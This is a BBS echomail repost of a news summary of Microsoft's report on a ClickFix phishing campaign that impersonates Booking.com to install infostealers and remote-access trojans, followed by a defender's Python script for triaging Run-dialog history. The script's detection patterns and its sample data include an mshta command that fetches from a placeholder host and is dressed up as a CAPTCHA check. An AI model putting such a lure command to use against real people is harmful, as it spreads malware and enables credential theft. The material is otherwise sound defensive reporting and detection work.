
Just a sample of the Echomail archive

Cooperative anarchy at its finest, still active today. Darkrealms is the Zone 1 Hub.

   CONSPRCY      How big is your tinfoil hat?      2,445 messages   


   Message 740 of 2,445   
   Mike Powell to All   
   MS warns about phishing c   
   14 Mar 25 09:20:00   
   
   TZUTC: -0500   
   MSGID: 455.consprcy@1:2320/105 2c3979f0   
   PID: Synchronet 3.20a-Linux master/acc19483f Apr 26 202 GCC 12.2.0   
   TID: SBBSecho 3.20-Linux master/acc19483f Apr 26 2024 23:04 GCC 12.2.0   
   BBSID: CAPCITY2   
   CHRS: ASCII 1   
   Microsoft warns about a new phishing campaign impersonating Booking.com   
      
   Date:   
   Thu, 13 Mar 2025 15:00:00 +0000   
      
   Description:   
   The goal of the campaign is to steal people's payment and personal data.   
      
   FULL STORY   
      
   Hotels, resorts, and other businesses in the hospitality industry are being   
   targeted with a sophisticated ClickFix phishing campaign that impersonates   
   Booking.com.    
      
   A new report from Microsoft Threat Intelligence claims that the phishing   
   campaign is rapidly evolving, and targeting businesses worldwide.    
      
   The goal of the campaign is to steal people's payment and personal data, which   
   could lead to wire fraud, and reputational harm for victim organizations.   
      
   Storm-1865    
      
   First, the attackers create a Booking.com-themed notification email,   
   discussing things like guest reviews, or account verifications. Businesses   
   that don't spot the scam are then redirected to a fake CAPTCHA puzzle, and if   
   they solve it, are prompted with an error message. That fake error message   
   also comes with a solution, which includes copying a command, and   
   pasting/running it in the Run program.    
      
   Instead of fixing the problem, running the program downloads one of multiple   
   malware strains being used in this campaign: XWorm, Lumma Stealer, or   
   VenomRAT. These are different types of malware with different features.    
      
   While VenomRAT, for example, is a remote access trojan that grants attackers   
   unabated access to victim devices, Lumma is an infostealer that grabs login   
   credentials and other secrets stored in the web browser, and elsewhere on    
   the device.    
      
   Microsoft attributed the campaign to a threat actor it tracks as Storm-1865,    
   a group with no previous record. The campaign apparently started in December   
   2024, and there is no information on how many companies - if any - fell prey   
   to it.    
      
   ClickFix fraud has gotten more popular lately, and TechRadar Pro has reported   
   on it on numerous occasions this year already. It is an evolution of the old   
   IT technician scam, in which a victim is served a popup impersonating a   
   reputable company saying their computer is broken/infected.    
      
   The popup shares a phone number that the victim can call, to talk to an IT   
   technician and sort the problem out. The technician ends up installing   
   malware.    
      
   While phone scams are still very much alive, the ClickFix campaign focuses   
   mostly on the victim doing most of the work, installing the malware through a   
   less-obvious process (pasting a command in Run).   
      
   ======================================================================   
   Link to news story:   
   https://www.techradar.com/pro/security/microsoft-warns-about-a-new-phishing-campaign-impersonating-booking   
      
   $$   
   --- SBBSecho 3.20-Linux   
    * Origin: capitolcityonline.net * Telnet/SSH:2022/HTTP (1:2320/105)   
   SEEN-BY: 105/81 106/201 128/187 129/305 153/7715 154/110 218/700 226/30   
   SEEN-BY: 227/114 229/110 111 114 206 300 307 317 400 426 428 470 664   
   SEEN-BY: 229/700 705 266/512 291/111 320/219 322/757 342/200 396/45   
   SEEN-BY: 460/58 712/848 902/26 2320/0 105 3634/12 5075/35   
   PATH: 2320/105 229/426   
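
A defender-side triage sketch for the "paste a command into Run" step described in the message above, added here as an example and not part of the original post or of the report it summarizes. It assumes the Run-dialog history has been exported from the per-user RunMRU registry key as name/data pairs; the launcher names, flags and lure words are illustrative heuristics, and the sample data is constructed.

```python
import re

# Heuristic signals. The launcher names, switches and lure words are
# assumptions for illustration, not indicators taken from the article.
LAUNCHER = re.compile(r"\b(powershell|pwsh|mshta|cmd|curl|wscript|cscript|rundll32|msiexec)(\.exe)?\b", re.I)
REMOTE = re.compile(r"https?://|\\\\[\w.-]+\\", re.I)            # URL or UNC path
HIDING = re.compile(r"(?<!\w)-(e|ec|enc\w*|w\s+h\w*|windowstyle\s+h\w*|nop\w*)\b", re.I)
LURE = re.compile(r"captcha|verif|not a robot|human", re.I)      # fake "fix" text

def run_history(values):
    """Return Run-dialog commands, most recent first.

    RunMRU stores each command under a one-letter value name with a
    trailing '\\1' marker; the MRUList value gives the recency order.
    """
    cmds = []
    for name in values.get("MRUList", ""):
        data = values.get(name)
        if data is not None:
            cmds.append(data[:-2] if data.endswith("\\1") else data)
    return cmds

def score(cmd):
    """List the signals a command trips."""
    checks = [(LAUNCHER, "script-capable launcher"),
              (REMOTE, "remote location"),
              (HIDING, "hidden or encoded execution"),
              (LURE, "verification lure text")]
    return [label for rx, label in checks if rx.search(cmd)]

def triage(values, threshold=2):
    """Commands tripping at least `threshold` signals; one signal alone
    (for example a plain UNC path) is normal Run-dialog use."""
    return [(c, s) for c in run_history(values) if len(s := score(c)) >= threshold]

# Constructed sample export; host and text are placeholders.
SAMPLE = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\rates.xlsx\\1",
    "c": "mshta https://example.invalid/verify # I am not a robot: CAPTCHA ID 0000\\1",
}

if __name__ == "__main__":
    for cmd, signals in triage(SAMPLE):
        print(f"REVIEW: {cmd!r} -> {', '.join(signals)}")
```

A hit is a lead for the responder to follow up with process and network telemetry from the same host, since users can clear or never populate this history.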
      



(c) 1994,  bbs@darkrealms.ca